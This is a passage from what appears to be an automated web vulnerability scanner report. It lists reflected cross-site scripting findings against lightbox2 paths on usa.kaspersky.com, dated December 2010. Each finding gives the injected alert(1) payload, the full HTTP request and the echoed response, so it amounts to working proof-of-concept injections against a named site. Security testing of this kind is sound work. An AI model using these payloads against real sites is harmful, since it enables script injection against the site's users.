<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5895da0b8"><script>alert(1)</script>c16bac04b10/lightbox2" />
...[SNIP]...

1.220. http://usa.kaspersky.com/node/5895/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5895/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce811"-alert(1)-"fddff72be08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/5895ce811"-alert(1)-"fddff72be08/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:57:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687833"
Content-Type: text/html; charset=utf-8
Content-Length: 29301
Date: Sat, 18 Dec 2010 15:57:24 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/5895ce811"-alert(1)-"fddff72be08/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.221. http://usa.kaspersky.com/node/5895/lightbox2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5895/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ebb1"><script>alert(1)</script>a46bc04dc01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5895/lightbox25ebb1"><script>alert(1)</script>a46bc04dc01 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:59:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687991"
Content-Type: text/html; charset=utf-8
Content-Length: 28795
Date: Sat, 18 Dec 2010 15:59:59 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5895/lightbox25ebb1"><script>alert(1)</script>a46bc04dc01" />
...[SNIP]...

1.222. http://usa.kaspersky.com/node/5895/lightbox2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5895/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 129c1"><script>alert(1)</script>b520b01989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5895/lightbox2?129c1"><script>alert(1)</script>b520b01989=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:51:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687515"
Content-Type: text/html; charset=utf-8
Content-Length: 13358
Date: Sat, 18 Dec 2010 15:52:05 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5895/lightbox2?129c1"><script>alert(1)</script>b520b01989=1" />
...[SNIP]...

1.223. http://usa.kaspersky.com/node/5896/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5896/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39cee"><script>alert(1)</script>a8168f72d80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node39cee"><script>alert(1)</script>a8168f72d80/5896/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:54:58 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687698"
Content-Type: text/html; charset=utf-8
Content-Length: 30163
Date: Sat, 18 Dec 2010 15:55:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node39cee"><script>alert(1)</script>a8168f72d80/5896/lightbox2" />
...[SNIP]...

1.224. http://usa.kaspersky.com/node/5896/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5896/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54ad5"-alert(1)-"ce7fc7bd75e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node54ad5"-alert(1)-"ce7fc7bd75e/5896/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:55:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687715"
Content-Type: text/html; charset=utf-8
Content-Length: 30066
Date: Sat, 18 Dec 2010 15:55:31 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node54ad5"-alert(1)-"ce7fc7bd75e/5896/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.225. http://usa.kaspersky.com/node/5896/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5896/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59425"-alert(1)-"e7a31af15ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/589659425"-alert(1)-"e7a31af15ec/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:58:26 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687906"
Content-Type: text/html; charset=utf-8
Content-Length: 29301
Date: Sat, 18 Dec 2010 15:58:37 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/589659425"-alert(1)-"e7a31af15ec/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.226. http://usa.kaspersky.com/node/5896/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5896/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b181"><script>alert(1)</script>173657780de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/58969b181"><script>alert(1)</script>173657780de/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:57:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687872"
Content-Type: text/html; charset=utf-8
Content-Length: 29398
Date: Sat, 18 Dec 2010 15:58:09 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/58969b181"><script>alert(1)</script>173657780de/lightbox2" />
...[SNIP]...

1.227. http://usa.kaspersky.com/node/5896/lightbox2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5896/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f984"><script>alert(1)</script>fb1aaee1f98 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5896/lightbox21f984"><script>alert(1)</script>fb1aaee1f98 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:01:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688060"
Content-Type: text/html; charset=utf-8
Content-Length: 28794
Date: Sat, 18 Dec 2010 16:01:10 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5896/lightbox21f984"><script>alert(1)</script>fb1aaee1f98" />
...[SNIP]...

1.228. http://usa.kaspersky.com/node/5896/lightbox2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5896/lightbox2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9bc7"><script>alert(1)</script>a1778df1ca9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5896/lightbox2?f9bc7"><script>alert(1)</script>a1778df1ca9=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:52:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687549"
Content-Type: text/html; charset=utf-8
Content-Length: 13359
Date: Sat, 18 Dec 2010 15:52:38 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5896/lightbox2?f9bc7"><script>alert(1)</script>a1778df1ca9=1" />
...[SNIP]...

1.229. http://usa.kaspersky.com/node/5897/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5897/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465ec"><script>alert(1)</script>e53ee7b9f91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node465ec"><script>alert(1)</script>e53ee7b9f91/5897/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:54:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687699"
Content-Type: text/html; charset=utf-8
Content-Length: 30163
Date: Sat, 18 Dec 2010 15:55:04 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node465ec"><script>alert(1)</script>e53ee7b9f91/5897/lightbox2" />
...[SNIP]...

1.230. http://usa.kaspersky.com/node/5897/lightbox2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5897/lightbox2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5f68"-alert(1)-"b6dce90fb51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nodef5f68"-alert(1)-"b6dce90fb51/5897/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:55:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687716"
Content-Type: text/html; charset=utf-8
Content-Length: 30065
Date: Sat, 18 Dec 2010 15:55:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodef5f68"-alert(1)-"b6dce90fb51/5897/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.231. http://usa.kaspersky.com/node/5897/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5897/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37288"><script>alert(1)</script>47cfba46496 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/589737288"><script>alert(1)</script>47cfba46496/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:57:38 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687858"
Content-Type: text/html; charset=utf-8
Content-Length: 29398
Date: Sat, 18 Dec 2010 15:57:47 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/589737288"><script>alert(1)</script>47cfba46496/lightbox2" />
...[SNIP]...

1.232. http://usa.kaspersky.com/node/5897/lightbox2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5897/lightbox2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a71f"-alert(1)-"00eb9c40524 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/58979a71f"-alert(1)-"00eb9c40524/lightbox2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:58:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687890"
Content-Type: text/html; charset=utf-8
Content-Length: 29301
Date: Sat, 18 Dec 2010 15:58:15 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/58979a71f"-alert(1)-"00eb9c40524/lightbox2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.233. http://usa.kaspersky.com/node/5897/lightbox2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5897/lightbox2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ab62"><script>alert(1)</script>29d08b982c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5897/lightbox26ab62"><script>alert(1)</script>29d08b982c0 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
